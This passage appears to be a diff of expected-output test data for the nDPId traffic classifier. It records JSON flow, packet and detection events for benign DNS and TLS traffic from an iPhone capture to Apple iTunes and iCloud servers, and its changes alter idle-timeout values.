00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1582454599930,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1582454599930,"pkt":"xGGLNYKpxiwDYGpkCABFAADjtQsAAEARP5zAqAIBwKgCEQA1\/jcAz3eX0zSBgAABAAUAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAMOwAmCHBsYXktY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAAAOmACIEcGxheQZpdHVuZXMFYXBwbGUDY29tCWVkZ2VzdWl0ZcBUwGUABQABAAAAXgAUBWExODA2BGRzY2IGYWthbWFpwFTAkwABAAEAAAAOAARce00awJMAAQABAAAADgAEXHtNQA=="} 00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":340,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599929,"flow_last_seen":1582454599930,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454599930,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.123.77.26"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599934,"flow_last_seen":1582454599934,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1582454599934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599934,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGzmnAqAIRXHtNGsWbAbupO4D5AAAAALDC\/\/\/ZMQAAAgQFtAEDAwcBAQgKEd\/tTwAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1582454599967,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599967,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGGW5ce00awKgCEQG7xZtUZWomqTuA+qBScSDQrwAAAgQFrAQCCAozMbcgEd\/tTwEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1582454600080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454600080,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGznXAqAIRXHtNGsWbAbupO4D6VGVqJ4AQBAtsOAAAAQEIChHf7eAzMbcg"} -00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599934,"flow_last_seen":1582454600080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600080,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599934,"flow_last_seen":1582454600116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599934,"flow_last_seen":1582454599934,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1582454599934,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599934,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGzmnAqAIRXHtNGsWbAbupO4D5AAAAALDC\/\/\/ZMQAAAgQFtAEDAwcBAQgKEd\/tTwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1582454599967,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599967,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGGW5ce00awKgCEQG7xZtUZWomqTuA+qBScSDQrwAAAgQFrAQCCAozMbcgEd\/tTwEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1582454600080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454600080,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGznXAqAIRXHtNGsWbAbupO4D6VGVqJ4AQBAtsOAAAAQEIChHf7eAzMbcg"} +00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599934,"flow_last_seen":1582454600080,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600080,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599934,"flow_last_seen":1582454600116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600454,"flow_last_seen":1582454600454,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454600454,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1582454600454,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1582454600454,"pkt":"xiwDYGpkxGGLNYKpCABFAABDtJ8AAP8RgafAqAIRwKgCAfi9ADUAL+BtI4YBAAABAAAAAAAABHN5bmMGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"} 00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600454,"flow_last_seen":1582454600454,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454600454,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"sync.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1582454600494,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1582454600494,"pkt":"xGGLNYKpxiwDYGpkCABFAADQcdgAAEARguLAqAIBwKgCEQA1+L0AvB7yI4aBgAABAAQAAAAABHN5bmMGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAF1gAmCHN5bmMtY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAAAWqABsGaXR1bmVzBWFwcGxlA2NvbQdlZGdla2V5wFTAZQAFAAEAABGWABgEZTY3MwVkc2NlOQpha2FtYWllZGdlwFTAjAABAAEAAAAYAARfZRg1"} 00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":422,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454600454,"flow_last_seen":1582454600494,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600494,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"sync.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600508,"flow_last_seen":1582454600508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454600508,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1582454600508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454600508,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAGXAqAIRX2UYNcWcAbsi3fgeAAAAALDC\/\/8YLgAAAgQFtAEDAwcBAQgKEd\/vhgAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1582454600541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454600541,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGS2lfZRg1wKgCEQG7xZzFmLU\/It34H6BScSB2MAAAAgQFrAQCCAqI0z6tEd\/vhgEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1582454600545,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454600545,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAHHAqAIRX2UYNcWcAbsi3fgfxZi1QIAQBAsSJAAAAQEIChHf76yI0z6t"} -00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454600508,"flow_last_seen":1582454600545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454600508,"flow_last_seen":1582454600580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600580,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1582454598252,"flow_last_seen":1582454599058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12558,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1582454598587,"flow_last_seen":1582454600617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10875,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1582454598721,"flow_last_seen":1582454600748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":73228,"flow_avg_l4_payload_len":951,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454599225,"flow_last_seen":1582454600287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7909,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454599740,"flow_last_seen":1582454600279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7913,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600508,"flow_last_seen":1582454600508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454600508,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1582454600508,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454600508,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAGXAqAIRX2UYNcWcAbsi3fgeAAAAALDC\/\/8YLgAAAgQFtAEDAwcBAQgKEd\/vhgAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1582454600541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454600541,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGS2lfZRg1wKgCEQG7xZzFmLU\/It34H6BScSB2MAAAAgQFrAQCCAqI0z6tEd\/vhgEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1582454600545,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454600545,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAHHAqAIRX2UYNcWcAbsi3fgfxZi1QIAQBAsSJAAAAQEIChHf76yI0z6t"} +00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454600508,"flow_last_seen":1582454600545,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454600508,"flow_last_seen":1582454600580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600580,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1582454598252,"flow_last_seen":1582454599058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12558,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1582454598587,"flow_last_seen":1582454600617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10875,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1582454598721,"flow_last_seen":1582454600748,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":73228,"flow_avg_l4_payload_len":951,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 